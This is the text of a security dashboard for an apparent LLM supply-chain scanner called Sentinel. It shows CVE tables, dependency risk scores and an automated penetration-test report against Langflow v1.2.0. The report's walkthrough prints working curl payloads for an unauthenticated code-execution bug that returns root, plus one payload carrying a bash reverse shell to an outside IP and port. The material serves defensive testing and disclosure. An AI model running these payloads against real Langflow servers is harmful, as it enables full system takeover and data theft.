Dashboard
Overview · 6 Apr 2026
0% False Positive Rate
Total Scans
48
LLM apps analysed
↑ 12 this month
CVEs Found
347
Across all components
183 proprietary
Critical Issues
24
Requiring action now
↑ 3 since last scan
Components
2,681
Dependencies mapped
100% parse rate

Recent Scans

Last 7 days
LangChain-RAG-Pipeline v2.1.4 · SCA + Pen Test · 2h ago · 312 components · Critical
LlamaIndex-Enterprise v0.9.2 · SCA · Yesterday · 187 components · High
OpenAI Agents SDK v1.2.0 · SCA + Pen Test · 2 days ago · 94 components · High
api4.ai2wj.com (OWASP Juice Shop) · Full Pen Test · 3 days ago · 1 Apr · Medium
AutoGPT v0.5.1 · SCA · 5 days ago · 241 components · Low

Ecosystem Risk

72
Overall Risk Score
24
Critical
67
High
112
Medium
144
Low

Activity

Critical CVE in langchain-core 0.1.5 — CVE-2024-3095 (CVSS 9.1)
2 hours ago
Pen test on api4.ai2wj.com — 14 exploits confirmed
1 day ago
New proprietary CVE added — LlamaIndex injection vector
2 days ago
AutoGPT v0.5.1 — 241 components parsed, 0 false positives
5 days ago
New Scan
LLM Supply Chain Security Analysis

Scan an LLM Application

Paste a repository URL or upload a project folder. Sentinel will map all components, detect CVEs, and run automated pen testing.

Target
2
Scan Type
3
Run & Report

Accepted: source folders, repositories, or individual code files

SCA Scan: Map all LLM components, detect CVEs, 0% false positive
Pen Test: Automated agentic pen testing, 660 exploitation tasks
Risk Score: Component-level scoring beyond CVSS for insurance & compliance
GitHub repositories run SCA. Public web URLs run Pen Test.
Scan History
All past scans

48 total
LangChain-RAG-Pipeline v2.1.4 · SCA + Pen Test · 312 components · 6 Apr 2026 14:32 · 86 · Critical
LlamaIndex-Enterprise v0.9.2 · SCA · 187 components · 5 Apr 2026 09:14 · 71 · High
OpenAI Agents SDK v1.2.0 · SCA + Pen Test · 94 components · 4 Apr 2026 16:50 · 68 · High
api4.ai2wj.com (OWASP Juice Shop) · Full Pen Test · 1 Apr 2026 · Template report · 54 · Medium
AutoGPT v0.5.1 · SCA · 241 components · 1 Apr 2026 11:05 · 22 · Low
SCA Progress
Awaiting scan submission
Docker pipeline · Live logs
0%
Waiting for repository
Sentinel will clone the repository, run SCA, derive architecture layers, and enrich vulnerability results.
SCA: Dependency detection and package inventory (pending)
Architecture: Layer inference and dependency mapping (pending)
Vulnerability: Offline enrichment and final risk matching (pending)
Scan Results
LangChain-RAG-Pipeline v2.1.4 · 6 Apr 2026 14:32
86
LangChain-RAG-Pipeline v2.1.4
github.com/example-org/langchain-rag-pipeline · SCA + Pen Test · 312 components · 11m 24s
LangChain 0.1.5 · LlamaIndex 0.9.2 · OpenAI SDK · Python 3.11 · 5 Critical CVEs
47 CVEs (5 proprietary)
312 Components (100% parse)
14 Exploits confirmed

CVE Findings

Sorted by severity
CVE ID | Component | Severity | CVSS | Status
CVE-2024-3095 | langchain-core 0.1.5 | Critical | 9.1 | Unpatched
⬛ PROP-0047 | llama-index 0.9.2 | Critical | 8.8 | No public PoC
CVE-2024-1876 | transformers 4.36.0 | High | 7.5 | Patch available
CVE-2023-9182 | openai 1.6.1 | High | 7.2 | Patch available
⬛ PROP-0031 | faiss-cpu 1.7.4 | Medium | 5.1 | No public PoC
⬛ Proprietary CVE — detected only by Sentinel, not in NVD/OSV · Showing 5 of 47

Component Risk

Top contributors
langchain-core 0.1.5 · 95
llama-index 0.9.2 · 82
transformers 4.36.0 · 75
openai 1.6.1 · 60
SCA Results SCA Only
LangChain-RAG-Pipeline v2.1.4 · github.com/example-org/langchain-rag-pipeline · 6 Apr 2026 14:32 · 4m 18s
0% False Positive Rate
74
LangChain-RAG-Pipeline v2.1.4
SCA Risk Score · 47 vulnerabilities across 312 components · Python 3.11 ecosystem
langchain-core 0.1.5 llama-index 0.9.2 transformers 4.36.0 openai 1.6.1 100% parse rate ⬛ 5 proprietary CVEs
Input files
requirements.txt
pyproject.toml
48 direct · 264 transitive
47
Total CVEs
5
Critical
12
High
18
Medium
Component Map
Dependency tree & supply chain visualisation

Dependency Tree

312 components
langchain-core 0.1.5
2 Critical CVEs · risk 95
langchain-community 0.0.24
1 High CVE
pydantic 2.4.2
1 Medium CVE
anyio 3.7.1
No CVEs found
llama-index 0.9.2
1 Critical (Prop) · risk 82
openai 1.6.1
1 High CVE
tiktoken 0.5.2
No CVEs found
transformers 4.36.0
1 High CVE · risk 75
tokenizers 0.15.0
No CVEs found
safetensors 0.4.1
No CVEs found
CVE Database
183 proprietary + NVD/OSV feed
183 Proprietary CVEs
🏗️ Placeholder — connect to CVE library API (llmscapi.wj2ai.com) for live database
Total CVEs
2,847
NVD + OSV + Proprietary
Proprietary
183
Lab-only, no public PoC
LLM-Specific
341
LangChain, LlamaIndex, etc.
Added This Month
12
New entries Apr 2026

CVE Library

2,847 entries
CVE ID | Component | Type | Severity | CVSS | Source | Added
⬛ PROP-0047 | llama-index 0.9.x | Prompt Injection | Critical | 8.8 | Proprietary | 2 Apr 2026
CVE-2024-3095 | langchain-core 0.1.x | Code Exec | Critical | 9.1 | NVD | Mar 2024
⬛ PROP-0031 | faiss-cpu 1.7.x | Memory Corruption | Medium | 5.1 | Proprietary | 28 Mar 2026
CVE-2024-1876 | transformers 4.36.x | Deserialization | High | 7.5 | NVD | Jan 2024
⬛ PROP-0019 | langchain-community | Tool Injection | High | 7.0 | Proprietary | 15 Mar 2026
CVE-2023-9182 | openai 1.6.x | Auth Bypass | High | 7.2 | NVD | Dec 2023
Showing 6 of 2,847 · ⬛ = Proprietary (lab-only) · Load more →
Risk Score
Component-level scoring methodology
🏗️ Placeholder — connect to Yongchi's risk scoring API for live component scores
Score Breakdown by Factor
CVE Severity
38
Weighted CVSS scores across all components, adjusted for exploitability and impact scope.
Dependency Depth
22
Transitive dependency chain length. Deeper chains increase attack surface and reduce patch visibility.
Exploit Availability
18
Whether working exploits exist (public PoC, Metasploit module, or Sentinel proprietary exploit).
Patch Availability
8
Proportion of CVEs with no available patch. Unpatched CVEs receive higher weighting.

Overall Score

86
/ 100 · Critical Risk
📌 38 pts from CVE severity
📌 22 pts from dep. depth
📌 18 pts from exploit avail.
📌 8 pts from no patches

Insurance Input

Frequency proxy: 312 components
Severity distribution: 5C / 12H / 18M / 12L
Avg CVSS: 6.8
Proprietary CVE exposure: 5 CVEs
For NTU actuarial model · Prof Zhu Wenjun
Component-Level Scores (top 10)
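Component | Version | CVE Count | Dep. Depth | Has Exploit | Patched | Score
langchain-core | 0.1.5 | 4 | 3 | Yes | No | 95
llama-index | 0.9.2 | 2 | 2 | Partial | No | 82
transformers | 4.36.0 | 2 | 4 | No | Yes | 75
openai | 1.6.1 | 1 | 2 | No | Yes | 60
faiss-cpu | 1.7.4 | 1 | 1 | Partial | No | 45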
Integrations
Connect Sentinel to your existing tools
Platform Connectors
API Keys

Rules & Policy
Configure scan behaviour, severity thresholds, and compliance rules
Scan Rules
Compliance Framework
Severity Thresholds
Custom Severity Labels

Map Sentinel severity levels to your organisation's internal classification. Exported reports will use your labels.

Report Defaults
Pen Test
LLM-driven Automated Penetration Testing
Non-lateral · Zero Collateral Impact
Attack Pipeline
Info Collection
Weakness Gathering
Filtering
Attack Planning
Exploitation
Target
Langflow
v1.2.0 · Uvicorn/React
CVEs Tested
12
3 filtered for exploit
Exploited
2
CVE-2025-3248 · CVE-2025-57760
Outcome
Root Access
uid=0 confirmed

Pen Test Summary

14
Exploits confirmed
29
Attack objectives
Bounded test scope with non-lateral execution
Response-adaptive exploit strategy
Prompt injection chain: 3 paths found
I. Executive Summary
This automated penetration test targeted Langflow Workflow Platform v1.2.0, using the Sentinel LLM agent pipeline to simulate real-world attacks. The engagement covered reconnaissance, CVE discovery, exploit generation, and privilege escalation — resulting in confirmed root access to the target system.
II. Target Overview
  • Application: Langflow Workflow Platform v1.2.0
  • Framework: React + Uvicorn (Python)
  • Server: 43.156.238.180:7860
  • Key Endpoints: /login · /api/v1/validate/code · /flow
  • Scan Mode: Non-lateral · Zero collateral impact
III. Vulnerability Summary
CVE ID | Component | Type | Severity | Status
CVE-2025-3248 | Langflow Core | Unauthenticated RCE | Critical | Exploited ✓
CVE-2025-57760 | Langflow CLI | Privilege Escalation | High | Exploited ✓
CVE-2025-68155 | React | XSS | High | Failed — patched
IV. Exploitation Walkthrough

🔍 Initial Reconnaissance

  • System detected: Langflow Workflow Platform v1.2.0
  • Live API discovered: /api/v1/validate/code
  • Auth endpoint: /login (JWT-based)

🎯 Exploit 1 — Privilege Escalation via CVE-2025-57760

A privilege escalation vulnerability in Langflow containers allows an authenticated user with RCE access to invoke the internal CLI to create a new superuser. This bypasses the UI registration flow, granting full admin access.

$ curl -X POST http://43.156.238.180:7860/api/v1/validate/code \
    -H "Content-Type: application/json" \
    -d '{ "code": "def foo(p=__import__(os).system(bash -i >& /dev/tcp/192.168.1.22/4444)):\n pass" }'
$ /app/.venv/bin/langflow superuser
Username: test | Password: test123456
Default folder created successfully.
Superuser created successfully.
HTTP/1.1 200 OK → is_superuser: true

🚀 Exploit 2 — Unauthenticated RCE via CVE-2025-3248

A remote, unauthenticated attacker can send crafted HTTP requests to the code validation endpoint to execute arbitrary system commands — without any login required.

$ curl -X POST http://43.156.238.180:7860/api/v1/validate/code \
    -H "Content-Type: application/json" \
    -d '{ "code": "@exec(raise Exception(subprocess.check_output([id])))\ndef foo():\n pass" }'
HTTP/1.1 200 OK
{ "function": { "errors": [ "uid=0(root) gid=0(root) groups=0(root)" ] } }
V. Findings & Recommendations

✅ Finding

CVE-2025-57760 enables remote attackers to create a new administrative user via internal CLI abuse. CVE-2025-3248 enables remote, unauthenticated attackers to execute arbitrary system commands including root-level account modifications.

🚨 Impact

Full system compromise achieved. Attacker obtained administrator privileges in the application and root shell access via unauthenticated remote command injection. All data on the host is at risk.

🛠️ Recommendations

  • ↑ Upgrade Langflow to a patched version immediately
  • 🔒 Restrict access to /api/v1/validate/code — require auth + IP allowlist
  • 🛡️ Introduce strict input sandboxing / code execution isolation
  • 🔑 Deploy API authentication and rate-limiting on all endpoints
  • 📊 Conduct continuous security regression testing with Sentinel